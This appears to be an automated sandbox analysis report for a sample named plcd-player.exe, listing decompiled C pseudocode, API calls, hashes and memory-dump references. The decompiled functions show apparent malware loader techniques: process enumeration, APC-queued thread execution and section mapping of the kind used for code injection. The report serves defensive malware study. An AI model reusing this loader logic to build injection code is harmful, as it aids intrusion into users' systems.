OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,01295481), ref: 013B92FA

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 013B92F5

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 450123788-631824599
Opcode ID: 4720514c3486e94029287d3332ac744f03881321348a83cb30ab9ddb05eec5aa
Instruction ID: 2ede4fdb45ac237b025d0132f7790faa3c78be96d3582e26aec4c5ab18687ccf
Opcode Fuzzy Hash: 4720514c3486e94029287d3332ac744f03881321348a83cb30ab9ddb05eec5aa
Instruction Fuzzy Hash: 9EE06DB02017028BD7309F39D4847D6BBE4AB45748F00891DE696CA658E7B4E044CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013B9639, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,?,0129EE97,?,?,0129EC44,?), ref: 013B963E
HeapAlloc.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B9645
GetProcessHeap.KERNEL32(00000000,00000000,?,?,0129EC44,?), ref: 013B968B
HeapFree.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B9692

Part of subcall function 013B94D7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,013B9681,00000000,?,?,0129EC44,?), ref: 013B94FB
Part of subcall function 013B94D7: HeapAlloc.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B9502

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 0c91a0d5ccf50768b81efd256fa5196c8f92f592ed73b52668b91537ca31c78e
Instruction ID: 972a821e76b85c6883fc1fff5b0414de97fd73fcabe6a5bd93576475714f9537
Opcode Fuzzy Hash: 0c91a0d5ccf50768b81efd256fa5196c8f92f592ed73b52668b91537ca31c78e
Instruction Fuzzy Hash: AAF090F264471257C7312BFC784CBDA2EA9AFC56797024029F74ACAA58EE24C401CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: plcd-player.exe PID: 4744 Parent PID: 5776 plcd-player.exeCOMMON

Executed Functions

Function 00A719A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A719A0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E00A71752();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E00A716EE(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E00A717CB(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E00A714AD(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E00A717E0(_t62,  &_v12) != 0) {
					 *0xa730f8 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0xa73100, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E00A713C4, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8);
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0xa730f8 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E00A716EE(_t69 + _t23);
				 *0xa730f8 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E00A717CB(_t61);
				goto L16;
			}

0x00a719a7
0x00a719ac
0x00a719ae
0x00a719b3
0x00a71b1b
0x00a71b1b
0x00a719bb
0x00a719bb
0x00a719bd
0x00a719c0
0x00a719c7
0x00a719cf
0x00a719d3
0x00a71a0d
0x00a719d5
0x00a719df
0x00a719e5
0x00a719e7
0x00a719ec
0x00a719f2
0x00a719f4
0x00a719f4
0x00a719fc
0x00a71a02
0x00a71a02
0x00a71a06
0x00a71a06
0x00a71a14
0x00a71a1a
0x00a71a23
0x00a71a26
0x00a71a2c
0x00a71a2f
0x00a71a36
0x00a71b17
0x00000000
0x00a71b18
0x00a71a47
0x00a71a87
0x00a71a8d
0x00a71a9d
0x00a71aa3
0x00a71aad
0x00a71b08
0x00a71b0a
0x00a71b0d
0x00a71b0d
0x00a71b13
0x00a71b15
0x00a71b15
0x00000000
0x00a71b13
0x00a71ab9
0x00a71ac7
0x00a71ac9
0x00a71acd
0x00a71ad0
0x00a71ad7
0x00a71adc
0x00a71ade
0x00a71ade
0x00a71ae6
0x00000000
0x00a71ae8
0x00a71aeb
0x00a71af1
0x00a71af6
0x00a71afd
0x00a71afd
0x00a71b04
0x00000000
0x00a71b04
0x00a71ae6
0x00a71a49
0x00a71a51
0x00a71a55
0x00a71a57
0x00a71a5b
0x00a71a7d
0x00a71a7d
0x00a71a83
0x00a71a83
0x00000000
0x00a71a83
0x00a71a5d
0x00a71a62
0x00a71a67
0x00a71a6e
0x00000000
0x00000000
0x00a71a73
0x00a71a76
0x00000000

APIs

Part of subcall function 00A71752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A719AC), ref: 00A71761
Part of subcall function 00A71752: GetVersion.KERNEL32 ref: 00A71770
Part of subcall function 00A71752: GetCurrentProcessId.KERNEL32 ref: 00A7178C
Part of subcall function 00A71752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00A717A5

Part of subcall function 00A716EE: HeapAlloc.KERNEL32(00000000,?,00A719CF,00000030,?,00000000), ref: 00A716FA

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00A719DF
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00A71A26
GetLongPathNameW.KERNEL32 ref: 00A71A55
GetLongPathNameW.KERNEL32 ref: 00A71A73
CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000030), ref: 00A71A9D
QueueUserAPC.KERNEL32(00A713C4,00000000,?,?,00000000), ref: 00A71AB9
GetLastError.KERNEL32(?,00000000), ref: 00A71AC9
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00A71AD0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A71AD7
SetLastError.KERNEL32(?,?,00000000), ref: 00A71ADE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00A71AEB
GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 00A71AFD
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A71B04
GetLastError.KERNEL32(?,00000000), ref: 00A71B08
GetLastError.KERNEL32(?,00000000), ref: 00A71B15

Strings

0, xrefs: 00A719F4

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2806485730-4108050209
Opcode ID: dd90923d2a493a66d663749b9e19bde224f16471f1f30a1b46df1fe1c83fd259
Instruction ID: 19bcc0b55d3df21ab6a12b5dfdcb422d3a6122d6b7ad63493f9b913cc10538c0
Opcode Fuzzy Hash: dd90923d2a493a66d663749b9e19bde224f16471f1f30a1b46df1fe1c83fd259
Instruction Fuzzy Hash: D1417C72D01219AADB10EFE98C84DAEBBFCEB48354B11C165E509E3150E7349E86DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A71C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00A71C90(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00A71703(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00a71c99
0x00a71ca0
0x00a71ca1
0x00a71ca2
0x00a71ca3
0x00a71ca4
0x00a71cb5
0x00a71cb9
0x00a71ccd
0x00a71cd0
0x00a71cd3
0x00a71cda
0x00a71cdd
0x00a71ce4
0x00a71ce7
0x00a71cea
0x00a71ced
0x00a71cf2
0x00a71d2d
0x00a71cf4
0x00a71cf7
0x00a71cfd
0x00a71d02
0x00a71d06
0x00a71d24
0x00a71d08
0x00a71d0f
0x00a71d1d
0x00a71d1d
0x00a71d06
0x00a71d35

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 00A71CED

Part of subcall function 00A71703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A71D02,00000002,00000000,?,?,00000000,?,?,00A71D02,00000002), ref: 00A71730

memset.NTDLL ref: 00A71D0F

Strings

@, xrefs: 00A71CDD

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction ID: 352e9b8706aaa51a7f0839daf98eae2e4d209ee69eba8db7c0f34dd09253f285
Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction Fuzzy Hash: 1D210BB5D0020DAFCB11DFA9C8849DEFBF9EB48354F108429E515F3210D7349A448F64

Uniqueness

Uniqueness Score: -1.00%

Function 00A71703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A71703(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00a71715
0x00a7171b
0x00a71729
0x00a71730
0x00a71735
0x00a7173b
0x00000000
0x00a7173c
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A71D02,00000002,00000000,?,?,00000000,?,?,00A71D02,00000002), ref: 00A71730

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: ffdcc6e4fd496a42a354a17644ecac92e1dfb8137d804c3b3dc59dbc28e0943a
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 15F037B590020CFFDB119FA5CC85CAFBBFDEB44394B108939F152E2090D6309E489B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A71E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00A71E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00A71F3A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0xa73104;
				_push(_t15 + 0xa7405e);
				_push(_t15 + 0xa74054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00A71F34();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0xa73108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00a71e22
0x00a71e2b
0x00a71e2f
0x00a71e35
0x00a71e3a
0x00a71e3f
0x00a71e42
0x00a71e45
0x00a71e4a
0x00a71e4b
0x00a71e4e
0x00a71e59
0x00a71e60
0x00a71e64
0x00a71e66
0x00a71e67
0x00a71e6a
0x00a71e6f
0x00a71e79
0x00a71e7b
0x00a71e7b
0x00a71e8f
0x00a71e95
0x00a71e99
0x00a71ee9
0x00a71e9b
0x00a71ea4
0x00a71eba
0x00a71ec2
0x00a71ed4
0x00a71ed8
0x00000000
0x00000000
0x00a71ec4
0x00a71ec7
0x00a71ecc
0x00a71ece
0x00a71ece
0x00a71eaf
0x00a71eb1
0x00a71eda
0x00a71edb
0x00a71edb
0x00a71ea4
0x00a71ef1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00A7143D,0000000A,?,?), ref: 00A71E2F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A71E45
_snwprintf.NTDLL ref: 00A71E6A
CreateFileMappingW.KERNELBASE(000000FF,00A73108,00000004,00000000,?,?), ref: 00A71E8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A7143D,0000000A,?), ref: 00A71EA6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00A71EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A7143D,0000000A,?), ref: 00A71ED2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A7143D,0000000A), ref: 00A71EDB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A7143D,0000000A,?), ref: 00A71EE3

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 39289c05633b620907861dc5816c6ba4f15d12a8704e7409375a9aaf2840748d
Instruction ID: ef2b942d5b12e2538fd6f49b2604c5754de733cc9b563c92f029510bf77109cb
Opcode Fuzzy Hash: 39289c05633b620907861dc5816c6ba4f15d12a8704e7409375a9aaf2840748d
Instruction Fuzzy Hash: 362159B2A00108AFDB11EBA8DC84EAA77F9EB48354F11C125FA1AD6190D6709D468B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F3E0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 194networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 00A8F41D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF), ref: 00A8F489
WSAStringToAddressW.WS2_32(?,?,00000000,?,00000080), ref: 00A8F4A6
WSAGetLastError.WS2_32(?,?,00000000,?,00000080), ref: 00A8F4AE

Strings

&', xrefs: 00A8F579
255.255.255.255, xrefs: 00A8F4F9

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLast$AddressByteCharMultiStringWide
String ID: &'$255.255.255.255
API String ID: 1649291596-3197135453
Opcode ID: 835434eac86599b3fa10e9aa48c5f7e1aededd79c2ba09ca1719b5f9115789b9
Instruction ID: 9d1a4023336259f5386a59e41e5b9cdb2100204b6837ca965c0c43639e4a091e
Opcode Fuzzy Hash: 835434eac86599b3fa10e9aa48c5f7e1aededd79c2ba09ca1719b5f9115789b9
Instruction Fuzzy Hash: 2B818270A01255CFCF349F28C894B9ABBB1AF55320F1482E9E89DDB291E7719D84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00AAB330, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AAB370
std::_Lockit::_Lockit.LIBCPMT ref: 00AAB392
std::_Lockit::~_Lockit.LIBCPMT ref: 00AAB3B2
__Getctype.LIBCPMT ref: 00AAB44B
std::_Facet_Register.LIBCPMT ref: 00AAB46A
std::_Lockit::~_Lockit.LIBCPMT ref: 00AAB482

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: c17b8b07c17a643bc28f9e5d031b5f5eb3437258090cddec39e0a69d8a940e19
Instruction ID: de026c843357abcd65398efe5d95ab46577df90dd58dc0279be68123d3ad6ecb
Opcode Fuzzy Hash: c17b8b07c17a643bc28f9e5d031b5f5eb3437258090cddec39e0a69d8a940e19
Instruction Fuzzy Hash: 4B41BF71914244DFCB10DF58D891AAAB7F4EF19720F148169EC46AB392EB30AD84DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A71000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A71000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00A716EE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0xa73104 + 0xa74014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0xa73104 + 0xa74151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00A717CB(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0xa73104 + 0xa74161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0xa73104 + 0xa74174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0xa73104 + 0xa74189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0xa73104 + 0xa7419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00A71C90(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00a7100e
0x00a71012
0x00a710d3
0x00a71018
0x00a71030
0x00a7103f
0x00a71046
0x00a71048
0x00a7104d
0x00a710cb
0x00a710cc
0x00a7104f
0x00a7105c
0x00a7105e
0x00a71063
0x00000000
0x00a71065
0x00a71072
0x00a71074
0x00a71079
0x00000000
0x00a7107b
0x00a71088
0x00a7108a
0x00a7108f
0x00000000
0x00a71091
0x00a7109e
0x00a710a0
0x00a710a5
0x00000000
0x00a710a7
0x00a710ad
0x00a710b3
0x00a710b8
0x00a710bd
0x00a710c2
0x00000000
0x00a710c4
0x00a710c7
0x00a710c7
0x00a710c2
0x00a710a5
0x00a7108f
0x00a71079
0x00a71063
0x00a7104d
0x00a710e1

APIs

Part of subcall function 00A716EE: HeapAlloc.KERNEL32(00000000,?,00A719CF,00000030,?,00000000), ref: 00A716FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00A71DBA,?,?,?,?,?,00000002,?,?), ref: 00A71024
GetProcAddress.KERNEL32(00000000,?), ref: 00A71046
GetProcAddress.KERNEL32(00000000,?), ref: 00A7105C
GetProcAddress.KERNEL32(00000000,?), ref: 00A71072
GetProcAddress.KERNEL32(00000000,?), ref: 00A71088
GetProcAddress.KERNEL32(00000000,?), ref: 00A7109E

Part of subcall function 00A71C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 00A71CED
Part of subcall function 00A71C90: memset.NTDLL ref: 00A71D0F

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: cc899bbec23dcf1277adf9ac654f6858f998b993e56713f4855b744e336ebf13
Instruction ID: 61748501d9b826eaccc6168ee5f0d4a727434f7a74b7aebc285c150c03768dcd
Opcode Fuzzy Hash: cc899bbec23dcf1277adf9ac654f6858f998b993e56713f4855b744e336ebf13
Instruction Fuzzy Hash: 632119B260064AAFDB11DFA9CD84DAAB7FCEB14344B01C565E54DC7211EB70EE868F60

Uniqueness

Uniqueness Score: -1.00%

Function 00C33503, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00C37E1A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00C37E4C

_free.LIBCMT ref: 00C33612
_free.LIBCMT ref: 00C33629
_free.LIBCMT ref: 00C33646
_free.LIBCMT ref: 00C33661
_free.LIBCMT ref: 00C33678

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: d426f1f8fe49eeaae9c263eb5b666339ca772e6bc7c305587718225a0d58f0c1
Instruction ID: 353096c24dbc14a3d70fed4e7dc47904f1b731478d81737402a5865cf4dd3774
Opcode Fuzzy Hash: d426f1f8fe49eeaae9c263eb5b666339ca772e6bc7c305587718225a0d58f0c1
Instruction Fuzzy Hash: 3251BD72A10704EFDB21DF69D842A6AB7F4FF58720F140A69E815DB291E731EB019B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A71D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0xa730e0 = _t1;
				if(_t1 != 0) {
					 *0xa730f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00A719A0(); // executed
					_t6 = _t4;
					HeapDestroy( *0xa730e0);
				}
				ExitProcess(_t6);
			}

0x00a71d39
0x00a71d42
0x00a71d48
0x00a71d4f
0x00a71d58
0x00a71d5d
0x00a71d63
0x00a71d6e
0x00a71d70
0x00a71d70
0x00a71d77

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00A71D42
GetModuleHandleA.KERNEL32(00000000), ref: 00A71D52
GetCommandLineW.KERNEL32 ref: 00A71D5D

Part of subcall function 00A719A0: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00A719DF
Part of subcall function 00A719A0: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00A71A26
Part of subcall function 00A719A0: GetLongPathNameW.KERNEL32 ref: 00A71A55
Part of subcall function 00A719A0: GetLongPathNameW.KERNEL32 ref: 00A71A73
Part of subcall function 00A719A0: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000030), ref: 00A71A9D
Part of subcall function 00A719A0: QueueUserAPC.KERNEL32(00A713C4,00000000,?,?,00000000), ref: 00A71AB9

HeapDestroy.KERNEL32 ref: 00A71D70
ExitProcess.KERNEL32 ref: 00A71D77

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 2501132232-0
Opcode ID: 04b3e4ee56a8683aea030ef1a568f224ac3a6d5c97ce700d1b31768f7ef546fd
Instruction ID: bbfc146840dd105cee7108b728baef163bca5584367decc84795e2aea7ed31bc
Opcode Fuzzy Hash: 04b3e4ee56a8683aea030ef1a568f224ac3a6d5c97ce700d1b31768f7ef546fd
Instruction Fuzzy Hash: 51E092319026209BC731ABF1AD0DB4E3EA8BF05791B05C519E50E92121D7340A83DBAA

Uniqueness

